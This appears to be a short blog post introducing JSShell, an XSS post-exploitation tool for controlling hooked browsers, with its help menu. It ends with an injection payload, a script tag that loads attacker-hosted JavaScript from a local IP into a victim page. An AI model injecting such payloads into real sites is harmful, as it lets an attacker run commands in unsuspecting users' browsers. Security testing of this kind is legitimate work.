I came across an interesting tool while browsing GitHub, so I'm sharing it.
The tool is called JSShell. You can think of it as an XSS post-exploitation tool; in short, it is a command-line version of BeEF.

https://github.com/Den1al/JSShell

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
    
>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>>

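It will rarely be needed during an assessment, but it looks good for additional impact testing or as a toy to play with. As with other XSS post-exploitation tools, you run the server and inject the path below (/content/js) to load the rest of the processing logic.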
<script src="http://192.168.0.14/content/js"></script>
